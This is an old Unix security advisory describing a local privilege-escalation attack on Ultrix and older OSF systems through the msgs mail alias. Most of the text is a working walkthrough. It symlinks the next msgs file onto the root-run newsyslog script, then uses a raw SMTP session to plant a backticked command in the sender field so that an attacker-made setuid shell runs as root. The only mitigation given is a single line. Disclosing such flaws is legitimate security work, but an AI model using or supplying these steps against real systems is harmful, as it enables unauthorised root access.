COMMAND

SYSTEMS AFFECTED

    Ultrix, older OSF, it should also work on any system that has  the
    msgs mail alias.

PROBLEM

        $ grep msgs /etc/aliases
        msgs: "|/usr/ucb/msgs -s"

    Ok, the first thing to do  is look in the /usr/msgs directory  (or
    whatever the directory is where the msgs files are kept), and  see
    what the next  msgs file will  be (if there  is 1 and  2, then the
    next one is pretty easy to figure out).

    Then, make  an executable  /tmp/a that  like makes  an suid  shell
    (this is pretty  easy to do,  if you can't  do it, don't  consider
    yourself a hacker).

    By  default,  newsyslog  executes  every  6  days  at 4 am, but it
    depends on the setup in crontab.   What it does is age the  syslog
    file (at /usr/adm/syslog.1, .2, ..., i think).

    symlink /usr/msgs/<nextmsg> -> /usr/adm/newsyslog
    $ telnet
    telnet> open localhost 25

    mail shit, version, etc

    expn msgs
    250 <"| /usr/ucb/msgs -s">
    mail from: <`/tmp/a`>
    rcpt to: msgs
    data
    doesn't matter what you put here
    .
    quit

    So now, when it  writes to /usr/msgs/<nextmsg>, it will  overwrite
    /usr/adm/newsyslog,  and  since  /usr/adm/newsyslog  is  a   shell
    script,  it  will  expand  `/tmp/a`  by  executing /tmp/a AS ROOT,
    giving you an suid shell or whatever /tmp/a does.

SOLUTION

    Remove msgs alias.